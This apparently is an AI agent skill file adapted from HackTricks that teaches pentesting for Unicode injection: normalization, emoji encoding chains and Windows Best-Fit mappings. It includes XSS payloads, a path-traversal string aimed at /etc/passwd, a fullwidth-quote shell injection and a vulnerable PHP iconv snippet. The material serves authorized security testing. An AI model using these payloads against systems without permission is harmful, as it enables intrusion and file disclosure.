Hacktricks-skills unicode-injection-pentest

How to find and exploit Unicode injection vulnerabilities in web applications. Use this skill whenever you're testing for XSS, SQLi, or other injection vulnerabilities and want to try Unicode-based bypass techniques. Trigger this when you encounter input validation, WAF filters, or encoding issues that might be vulnerable to Unicode normalization attacks, emoji injection, or Windows Best-Fit character mapping exploits.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/pentesting-web/unicode-injection/unicode-injection/SKILL.MD

source content

Unicode Injection Pentesting

A skill for discovering and exploiting Unicode injection vulnerabilities in web applications.

Overview

Unicode injection vulnerabilities occur when back-end or front-end systems behave unexpectedly when receiving unusual Unicode characters. Attackers can bypass protections and inject arbitrary characters to exploit injection vulnerabilities like XSS or SQLi.

Attack Vectors

1. Unicode Normalization Attacks

When it happens: Systems modify user input after validation (e.g., converting to uppercase/lowercase).

How it works: Unicode characters normalize to ASCII during transformation, generating new characters that bypass filters.

Example:

Input: 㱋 (\u3c4b)
After normalization: <4b
Result: < character injected

Testing approach:

Identify input fields with case conversion or normalization
Send Unicode characters that normalize to dangerous ASCII
Check if the normalized output bypasses filters

2. \u to % Conversion Attacks

When it happens: Backend transforms

\u

prefix to

(URL encoding style).

How it works:

\u3c4b

becomes

%3c4b

, which URL-decodes to

<4b

, injecting

Testing approach:

Find Unicode characters with
```
\u
```
representation
Send them to the application
Check if the backend converts
```
\u
```
to
```
%
```
Verify if URL decoding creates injection characters

Useful resources:

Unicode Explorer - Find character codes
Unicode Injection Research - Deep dive

3. Emoji Injection Attacks

When it happens: Backends mishandle emoji encoding conversions.

How it works: Encoding mismatches (e.g., Windows-1252 to UTF-8 to ASCII) can normalize emoji to dangerous characters.

Example payload:

💋img src=x onerror=alert(document.domain)//💛

Vulnerable pattern:

$str = htmlspecialchars($_GET["str"]);
$str = iconv("Windows-1252", "UTF-8", $str);
$str = iconv("UTF-8", "ASCII//TRANSLIT", $str);

Testing approach:

Send emoji payloads with embedded injection code
Check for encoding conversion chains
Look for normalization to ASCII characters

Emoji lists:

4. Windows Best-Fit/Worst-Fit Attacks

When it happens: Windows applications use "W" (wide) APIs but call "A" (ANSI) APIs, triggering Best-Fit conversion.

How it works: Windows replaces Unicode characters that can't display in ASCII with similar ASCII characters.

Common mappings:

Characters mapped to
```
/
```
(0x2F) - path traversal
Characters mapped to
```
\
```
(0x5C) - path traversal
Fullwidth double quotes (U+FF02) - argument injection

Example:

Input: " (fullwidth double quote U+FF02)
After Best-Fit: " (ASCII double quote)
Result: Shell argument splitting

Testing approach:

Check if target uses Windows with W→A API conversion
Use worst.fit mapping to find character mappings
Send Unicode characters that map to dangerous ASCII
Test blacklist bypasses, path traversal, shell escape bypasses

Testing Workflow

Step 1: Reconnaissance

Identify input vectors: Forms, URL parameters, headers, file uploads
Check for encoding: Look for iconv, htmlspecialchars, case conversion
Determine platform: Windows vs Linux (affects Best-Fit applicability)
Map the data flow: Where does input go? What transformations occur?

Step 2: Initial Testing

Send basic Unicode: Test with common Unicode characters
Check normalization: Look for case conversion or encoding changes
Test emoji: Send emoji payloads with embedded code
Try \u sequences: Send Unicode escape sequences

Step 3: Advanced Testing

Use worst.fit mappings: Find characters that map to dangerous ASCII
Test encoding chains: Multiple conversions can create vulnerabilities
Bypass blacklists: Use Unicode equivalents of blocked characters
Path traversal: Map characters to
```
/
```
and
```
\
```
Shell injection: Use fullwidth quotes for argument splitting

Step 4: Verification

Check output: Does the injection work?
Review logs: What did the backend receive?
Test impact: Can you execute code, read files, etc.?
Document findings: Save payloads and results

Common Payloads

XSS via Unicode

\u3c4b<script>alert(1)</script>\u3e4b
💋<img src=x onerror=alert(1)>💛

Path Traversal via Best-Fit

/\u2215..\u2215etc\u2215passwd  # Characters mapping to /

Shell Injection via Fullwidth Quotes

"\uff02ls\uff02  # Fullwidth quotes that become ASCII quotes

Tools and Resources

Unicode Explorer - Character lookup
worst.fit - Windows Best-Fit mappings
Unicode Emoji Charts - Emoji reference

Important Notes

Windows Best-Fit requires W→A API conversion: Not all Windows apps are vulnerable
Encoding matters: UTF-8, Windows-1252, ASCII conversions create different behaviors
Some vulnerabilities won't be fixed: Best-Fit is a Windows feature, not a bug
Test in context: What works depends on the specific application and platform

When to Use This Skill

Testing input validation and WAF bypasses
Investigating XSS or SQLi that seems filtered
Analyzing encoding-related issues
Pentesting Windows-based web applications
Reviewing applications with Unicode handling
When standard injection payloads are blocked

Safety and Ethics

Only test systems you have authorization to test
Document all findings for remediation
Unicode injection can have unintended side effects
Some exploits may cause application crashes or data corruption